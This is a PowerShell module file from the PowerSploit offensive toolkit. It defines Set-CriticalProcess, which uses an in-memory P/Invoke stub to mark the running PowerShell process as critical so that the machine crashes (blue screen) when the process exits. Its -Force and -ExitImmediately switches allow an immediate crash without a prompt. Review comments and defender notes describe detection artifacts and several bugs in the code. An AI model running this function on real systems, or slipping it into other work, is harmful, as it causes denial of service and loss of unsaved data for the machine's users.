Mayhem/Mayhem.psm1

function Set-CriticalProcess
{
<#
.SYNOPSIS

Causes your machine to blue screen upon exiting PowerShell.

PowerSploit Function: Set-CriticalProcess
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Marks the current PowerShell process as a critical process by calling
ntdll!NtSetInformationProcess with information class 29
(ProcessBreakOnTermination). The caller must be a member of the local
Administrators group, and unless -Force is given the function prompts via
ShouldContinue before making the call. The P/Invoke stub is emitted into an
in-memory dynamic assembly (AssemblyBuilderAccess.Run) at run time.

The NTSTATUS returned by NtSetInformationProcess is discarded; the verbose
success message is written whenever the call does not throw, so it does not
by itself prove the flag was set.

.PARAMETER ExitImmediately

Immediately exit PowerShell after successfully marking the process as critical.

.PARAMETER Force

Set the running PowerShell process as critical without asking for confirmation.

.EXAMPLE

Set-CriticalProcess

.EXAMPLE

Set-CriticalProcess -ExitImmediately

.EXAMPLE

Set-CriticalProcess -Force -Verbose

.NOTES

Defender notes: the only gate in this code is membership of the current
token in the local Administrators role, so limiting that membership limits
who can run it. The observable effect is an unexpected bug check when the
PowerShell process that made the call exits; a PowerShell process that
defines a dynamic assembly exposing NtSetInformationProcess is the
in-process artifact worth alerting on.

#>


    # SupportsShouldProcess is declared but ShouldProcess is never called in the body;
    # only the explicit ShouldContinue prompt below gates execution, so -WhatIf has no effect here.
    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
        [Switch]
        $Force,

        [Switch]
        $ExitImmediately
    )

    # Require an elevated token: the current WindowsIdentity must hold the built-in Administrator role.
    if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
    {
        throw 'You must run Set-CriticalProcess from an elevated PowerShell prompt.'
    }

    $Response = $True

    # Without -Force, ask the operator to confirm; ShouldContinue returns $False when declined.
    if (!$Force)
    {
        $Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.')
    }
    
    if (!$Response)
    {
        return
    }

    # Build an in-memory dynamic assembly ('Run' access: never persisted to disk) to host the P/Invoke stub.
    $DynAssembly = New-Object System.Reflection.AssemblyName('BlueScreen')
    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BlueScreen', $False)

    # Define [BlueScreen.Win32.ntdll]::NtSetInformationProcess(IntPtr, UInt32, ref IntPtr, UInt32) -> Int32 (NTSTATUS)
    $TypeBuilder = $ModuleBuilder.DefineType('BlueScreen.Win32.ntdll', 'Public, Class')
    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('NtSetInformationProcess',
                                                        'ntdll.dll',
                                                        ([Reflection.MethodAttributes] 'Public, Static'),
                                                        [Reflection.CallingConventions]::Standard,
                                                        [Int32],
                                                        [Type[]] @([IntPtr], [UInt32], [IntPtr].MakeByRefType(), [UInt32]),
                                                        [Runtime.InteropServices.CallingConvention]::Winapi,
                                                        [Runtime.InteropServices.CharSet]::Auto)

    $ntdll = $TypeBuilder.CreateType()

    # Handle to this process. AllocHGlobal(4) reserves a 4-byte buffer that is never written
    # to and never freed (see the NOTE(review) on the call below).
    $ProcHandle = [Diagnostics.Process]::GetCurrentProcess().Handle
    $ReturnPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(4)

    # ProcessBreakOnTermination information class; its information buffer is a 4-byte value.
    $ProcessBreakOnTermination = 29
    $SizeUInt32 = 4

    try
    {
        # NOTE(review): [Ref] $ReturnPtr passes a reference to the IntPtr variable itself, not to the
        # buffer it points at, so the 4 bytes read by the call appear to be the (nonzero) pointer value
        # rather than an explicit 1 — confirm. The NTSTATUS result is assigned to $null and never
        # checked, so a non-success status still reaches the verbose message below.
        $null = $ntdll::NtSetInformationProcess($ProcHandle, $ProcessBreakOnTermination, [Ref] $ReturnPtr, $SizeUInt32)
    }
    catch
    {
        # A thrown error (e.g. the P/Invoke failing to bind) exits quietly with no error or verbose output.
        return
    }

    Write-Verbose 'PowerShell is now marked as a critical process and will blue screen the machine upon exiting the process.'

    # Terminating this process is what triggers the break-on-termination behaviour.
    if ($ExitImmediately)
    {
        Stop-Process -Id $PID
    }
}